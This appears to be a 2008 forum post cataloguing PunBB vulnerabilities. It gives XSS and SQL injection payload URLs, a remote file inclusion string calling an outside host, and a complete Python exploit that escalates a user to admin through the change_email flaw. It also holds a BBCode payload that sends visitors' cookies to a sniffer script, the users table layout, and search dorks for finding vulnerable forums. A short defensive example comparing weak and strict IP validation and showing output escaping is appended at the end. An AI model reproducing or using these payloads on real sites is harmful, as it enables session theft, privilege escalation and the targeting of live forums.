[PunBB vulnerability overview]
#1
20.01.2008, 04:28
ettee
Administrator

PunBB <= 1.2.14 Remote Code Execution Exploit
PunBB version <= 1.2.2 Authentication Bypass Exploit
ShAnKaR: multiple PHP application poison NULL byte vulnerability
PunBB 1.2.4 (change_email) SQL Injection Exploit


1.2.11
PHP code:
index.php&req_subject=test&req_message=test"><script>alert(1);</script>
<= 1.2.16(moderate.php)
PHP code:
preg_match('/[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}/', $_GET['get_host'])
moderate.php?get_host=1.1.1.1<script>alert(1)</script>

<= 1.2.15 (message_popup.php) XSS code vulnerability
PHP code:
<?php echo $lang_pms['Popup new'], $return['sender'], $lang_pms['Popup subj'], $return['subject'] ?><br><?php echo $lang_pms['Popup send'], format_time($return['posted']) ?>
<= 1.2.13 SQL Injection
PHP code:
search.php?action=search&keywords=hello&author=&forum=-1&search_in=all&sort_by=0&sort_dir=DESC&show_as=topics&search=1&result_list[< UNION SQL QUERY >/*]&1763905137=1&1121320991=1
dork: warning: ini_get has been

Remote File Inclusion in forum PunBB 1.1.2 >> 1.1.5
PHP code:
include/common.php?pun_root=http://www.host_evil.com/cmd?&=id
PunBB <= 1.2.4 - change email to become admin exploit

Code:
#!/usr/bin/python
#######################################################################
#  _  _                _                     _       ___  _  _  ___ 
# | || | __ _  _ _  __| | ___  _ _   ___  __| | ___ | _ \| || || _ \
# | __ |/ _` || '_|/ _` |/ -_)| ' \ / -_)/ _` ||___||  _/| __ ||  _/
# |_||_|\__,_||_|  \__,_|\___||_||_|\___|\__,_|     |_|  |_||_||_|  
#
#######################################################################
#         Proof of concept code from the Hardened-PHP Project 
#######################################################################
#
#                           -= PunBB 1.2.4 =-
#                   change_email SQL injection exploit
#
#  user-supplied data within the database is still user-supplied data
#
#######################################################################

import urllib
import getopt
import sys
import string

__argv__ = sys.argv

def banner():
    print "PunBB 1.2.4 - change_email SQL injection exploit"
    print "Copyright (C) 2005 Hardened-PHP Project\n"

def usage():
    banner()
    print "Usage:\n"
    print "   $ ./punbb_change_email.py [options]\n"
    print "        -h http_url   url of the punBB forum to exploit"
    print "                      f.e. http://www.forum.net/punBB/"
    print "        -u username   punBB forum useraccount"
    print "        -p password   punBB forum userpassword"
    print "        -e email      email address where the admin level activation email is sent"
    print "        -d domain     catch all domain to catch \"some-SQL-Query\"@domain emails"
    print ""
    sys.exit(-1)

def main():
    try:
        opts, args = getopt.getopt(sys.argv[1:], "h:u:p:e:d:")
    except getopt.GetoptError:
        usage()

    if len(__argv__) < 10:
        usage()

    username = None
    password = None
    email = None
    domain = None
    host = None
    for o, arg in opts:
        if o == "-h":
            host = arg
        if o == "-u":
            username = arg
        if o == "-p":
            password = arg
        if o == "-e":
            email = arg
        if o == "-d":
            domain = arg

    # Printout banner
    banner()

    # Check if everything we need is there
    if host == None:
        print "[-] need a host to connect to"
        sys.exit(-1)
    if username == None:
        print "[-] username needed to continue"
        sys.exit(-1)
    if password == None:
        print "[-] password needed to continue"
        sys.exit(-1)
    if email == None:
        print "[-] email address needed to continue"
        sys.exit(-1)
    if domain == None:
        print "[-] catch all domain needed to continue"
        sys.exit(-1)

    # Retrieve cookie
    params = {
        'req_username' : username,
        'req_password' : password,
        'form_sent' : 1
    }

    wclient = urllib.URLopener()

    print "[+] Connecting to retrieve cookie"

    req = wclient.open(host + "/login.php?action=in", urllib.urlencode(params))
    info = req.info()
    if 'set-cookie' not in info:
        print "[-] Unable to retrieve cookie... something is wrong"
        sys.exit(-3)
    cookie = info['set-cookie']
    cookie = cookie[:string.find(cookie, ';')]
    print "[+] Cookie found - extracting user_id"
    user_id = cookie[string.find(cookie, "%3A%22")+6:string.find(cookie, "%22%3B")]
    print "[+] User-ID: %d" % (int(user_id))
    wclient.addheader('Cookie', cookie);

    email = '"' + email[:string.find(email, '@')] + '"@' + email[string.find(email, '@')+1:] + ',"\','
    append = 'group_id=\'1'
    email = email + ( ((50-len(append))-len(email)) * ' ' ) + append + '"@' + domain

    params = {
        'req_new_email' : email,
        'form_sent' : 1
    }

    print "[+] Connecting to request change email"
    req = wclient.open(host + "profile.php?action=change_email&id=" + user_id,
                       urllib.urlencode(params))

    print "[+] Done... Now wait for the email. Log into punBB, go to the link in the email and become admin"

if __name__ == "__main__":
    main()
PunBB BBCode URL Tag Script Injection Vulnerability
PHP code:
[color=#EFEFEF][url]www.ut[url=www.s=''style='font-size:0;color:#EFEFEF'style='top:expression(eval(this.sss));'sss=`i=new/**/Image();i.src='http://baba/sniffer.php?c='+document.cookie;this.sss=null`style='font-size:0;][/url][/url]'[/color]


-punbb_users
--id
--group_id
--username
--password


Dork example:
intext:"Powered by PunBB 1.2.5"
intext:"Powered by PunBB" -"1.2.6" -"1.2.7"
intext:"Powered by PunBB 1.1.0...7" OR "Powered by PunBB 1.2.0...7"
intext:"Powered by PunBB" -"1.2.6" -"1.2.7" inurl:index.php -blog -inurl:"page=info" -inurl:"page=all" -inurl:"showtopic"
intext:"Powered by PunBB" -"1.2.6" -"1.2.7" inurl:index.php -blog

Last edited by ettee; 20.01.2008 at 04:40.
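Added example, not code from the post or from PunBB: the unanchored dotted-quad check the post quotes from moderate.php sits beside an anchored IPv4 check, and the message_popup.php case is covered by escaping fields on output. The inputs are constructed (the first is the post's get_host value) and all function names are my own.

```python
import html
import ipaddress
import re

# Constructed inputs; the first is the get_host value quoted in the post.
SAMPLES = [
    "1.1.1.1<script>alert(1)</script>",
    "1.1.1.1",
    "999.1.1.1",
    "example.com",
]

# Same pattern the post quotes from moderate.php. Without ^ and $ anchors,
# preg_match() (re.search here) succeeds when a dotted quad appears anywhere.
WEAK_IP_RE = re.compile(r"[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}")


def weak_is_ip(value):
    """The check as quoted in the post: a substring match is enough."""
    return WEAK_IP_RE.search(value) is not None


def strict_is_ip(value):
    """Hardened check: the whole value must parse as an IPv4 address, which
    rejects trailing markup and out-of-range octets such as 999."""
    try:
        ipaddress.IPv4Address(value)
    except ValueError:
        return False
    return True


def render_popup(sender, subject):
    """Output side, the message_popup.php case: fields echoed into HTML are
    escaped, so a sender name carrying markup renders as inert text."""
    return "<b>%s</b>: %s" % (html.escape(sender, quote=True),
                              html.escape(subject, quote=True))


if __name__ == "__main__":
    for v in SAMPLES:
        print("%-36r weak=%-5s strict=%s" % (v, weak_is_ip(v), strict_is_ip(v)))
    print(render_popup("<script>alert(1)</script>", "hello"))
```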